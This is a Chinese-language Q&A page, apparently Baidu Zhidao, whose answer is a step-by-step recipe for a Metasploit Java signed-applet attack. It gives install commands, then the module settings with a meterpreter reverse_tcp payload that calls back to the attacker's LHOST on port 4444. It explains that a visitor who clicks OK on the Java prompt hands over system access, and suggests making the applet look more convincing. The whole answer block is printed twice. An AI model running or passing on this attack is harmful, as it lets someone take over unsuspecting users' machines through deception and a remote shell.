如何使用Metasploit进行Java Applet攻击
1个回答
展开全部
安装 Sun Java JDK 和 rjb gem, 并且设置环境变量
—–code—–
root@bt: apt-get install sun-java6-jdk
root@bt: gem install rjb
变量设置
root@bt: echo “JAVA_HOME=/usr/lib/jvm/java-6-sun” >> /etc/bash.bashrc
root@bt: echo “export JAVA_HOME” >> /etc/bash.bashrc
root@bt: JAVA_HOME=/usr/lib/jvm/java-6-sun
root@bt: export JAVA_HOME
—end code——
—start metasploit—–
use exploit/multi/browser/java_signed_applet
set TARGET 1 //请注意你的目标
set SRVHOST 10.2.4.200
set SRVPORT 80
set URIPATH pentura
set PAYLOAD /meterpreter/reverse_tcp
set LHOST 10.2.4.200
set LPORT 4444
—end metasploit——–
———————————————————————-
如果当有一台机子访问了你的80端口
METASPLOIT控制端里将会显示详细的信息
———————————————————————
访问你80端口的机子浏览器会跳出java窗口,如果目标点击确定,你就能取得系统权限
你还可以修改java小程序的,以便实现更加真是的ssl.
—–code—–
root@bt: apt-get install sun-java6-jdk
root@bt: gem install rjb
变量设置
root@bt: echo “JAVA_HOME=/usr/lib/jvm/java-6-sun” >> /etc/bash.bashrc
root@bt: echo “export JAVA_HOME” >> /etc/bash.bashrc
root@bt: JAVA_HOME=/usr/lib/jvm/java-6-sun
root@bt: export JAVA_HOME
—end code——
—start metasploit—–
use exploit/multi/browser/java_signed_applet
set TARGET 1 //请注意你的目标
set SRVHOST 10.2.4.200
set SRVPORT 80
set URIPATH pentura
set PAYLOAD /meterpreter/reverse_tcp
set LHOST 10.2.4.200
set LPORT 4444
—end metasploit——–
———————————————————————-
如果当有一台机子访问了你的80端口
METASPLOIT控制端里将会显示详细的信息
———————————————————————
访问你80端口的机子浏览器会跳出java窗口,如果目标点击确定,你就能取得系统权限
你还可以修改java小程序的,以便实现更加真是的ssl.
本回答被提问者和网友采纳
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
